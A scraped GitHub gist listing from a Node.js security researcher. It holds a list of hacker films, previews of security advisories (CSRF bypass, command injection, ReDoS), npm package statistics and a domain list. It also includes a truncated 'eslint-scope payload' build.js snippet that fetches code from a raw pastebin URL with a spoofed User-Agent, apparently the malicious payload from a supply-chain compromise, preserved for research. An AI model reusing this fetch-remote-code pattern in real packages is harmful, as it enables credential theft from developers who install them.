Skip to content

Instantly share code, notes, and snippets.

Adam Baldwin evilpacket

Block or report user

Report or block evilpacket

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View gist:9699f0f91443303d98c496d4c9e5b053
(Swedish) Girl with a dragon tattoo
Hackers
WarGames
Antitrust
Swordfish
TRON
Sneakers
Joe Dante's Explorers (1985)
The imitation game
The KGB, the computer, and me
View the-dangers-of-square-bracket-notation.md
date slug tags title author type
Wed Jan 14 17:30:08 PST 2015
the-dangers-of-square-bracket-notation
security, node.js, javascript, hapi, RCE, square bracket notation, io.js
The Dangers of Square Bracket Notation
Jon Lamendola
text

We are going to be looking at some peculiar and potentially dangerous implications of Javascript's square bracket notation in this post: where you shouldn't use this style of object access and why, as well how to use it safely when needed.

View bypass-connect-csrf-protection-by-abusing.md
date slug tags title author type
2013-09-07 17:03:10 GMT
bypass-connect-csrf-protection-by-abusing
CSRF, connect, methodOverride, middleware
Bypass Connect CSRF protection by abusing methodOverride Middleware
Node Security Team
text

Since our platform isn't setup for advisories that are not specific to a particular module version, but rather a use / configuration of a certain module, we will announce this issue here and get it into the database at a later date.

View Avoid-Command-Injection-Node.md
date slug tags title author type
2014-08-19 17:04:34 GMT
Avoid-Command-Injection-Node.js
security, node.js, injection
Avoiding Command Injection in Node.js
Adam Baldwin
text
View regular-expression-dos-and-node.md
date slug tags title author type
Mon Nov 03 8:00:00 PDT 2014
regular-expression-dos-and-node.js
security, node.js, redos
Regular Expression DoS and Node.js
Adam Baldwin
text

Imagine you are trying to buy a ticket to your favorite JavaScript conference, and instead of getting the ticket page, you instead get 500 Internal Server Error. For some reason the site is down. You can't do the thing that you want to do most and the conference is losing out on your purchase, all because the application is unavailable.

@evilpacket
evilpacket / build.js
Created Jul 13, 2018
eslint-scope payload
View build.js
try {
var https = require("https");
https
.get(
{
hostname: "pastebin.com",
path: "/raw/XLeVP82h",
headers: {
"User-Agent":
"Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0",
View binary + download count
ws: 18300469
fsevents: 17784701
gaze: 11832681
node-sass: 8865218
bson: 2686185
uws: 2360991
dtrace-provider: 1567984
pg: 1407674
grpc: 1137348
iltorb: 932043
View packages with bindings.gyp in root
17monip
2wire
3000
3drotate
51degrees
64
7lab_groove_test
7zjs
@a-sync/opencv4nodejs
@achingbrain/node-syslog
View Download stuff over HTTP
"name","version"
"tarantul","0.8.86"
"tarantul","0.8.86"
"tarantul","0.8.84"
"tarantul","0.8.84"
"zookeeper-robskillington-3.4.3","3.4.3-1"
"zookeeper-robskillington-3.4.3","3.4.3-1"
"zookeeper-robskillington-3.4.3","3.4.3-1"
"youstream","0.1.2"
"zookeeper-rp","3.4.5-2"
View gist:ee2a94b812640ce749b5a936ca243235
5752dabccfc54c4ab82aea9626b7338e.monitor-eqatec.com
7af4ds.com2.z0.glb.qiniucdn.com
7rylsh.com1.z0.glb.clouddn.com
7xojg5.com1.z0.glb.clouddn.com
7xov2q.dl1.z0.glb.clouddn.com
acsc.cs.utexas.edu
admin.brightcove.com
airdownload.adobe.com
ajax.googleapis.com
akamai.bintray.com
You can’t perform that action at this time.